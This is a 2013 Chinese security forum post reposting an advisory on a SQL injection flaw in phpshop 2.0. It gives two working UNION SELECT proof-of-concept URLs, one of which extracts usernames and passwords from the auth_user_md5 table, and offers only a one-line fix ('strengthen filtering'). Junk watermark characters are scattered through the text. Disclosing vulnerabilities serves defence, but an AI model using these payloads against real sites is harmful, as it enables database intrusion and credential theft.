找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1950|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability- P  K/ @$ `, Q& l  }
/ q  Z" @) [' R
作者 : By onestree3 R: V4 d# T0 R+ p
下载地址 : http://code.google.com/p/phpshop/downloads/list  N5 ^" I. l* w/ m  |3 O
测试地址: windows 7 / ubuntu
  Z( P. \3 W+ y, |' `: Z. f
+ j2 G4 i( B, T- W1 _5 W& L ) g9 l- M' q" F  B, P( P
SQLi p0c:
# `+ }0 M& V4 u2 @3 v
7 j8 X; \. u4 B& N5 C==================1 `& Q( Q- d9 }8 Y
% O; A; c8 W+ t. y4 ?) c
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'- v! S: b- D+ r* p6 R
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --) M6 {3 u$ B  k- j
- d2 A5 d( W1 a
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
% g) O5 |% `1 n3 u" \
8 v. J2 G9 T6 W( s修复:
( y) Q! N+ F9 O4 p' L4 Y加强过滤
! S. u9 v3 K, d, `4 G
0 V0 {8 z5 m3 k/ {: D( h7 c1 W; V( ]8 |- G7 {2 ~( N+ k* v& h# Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表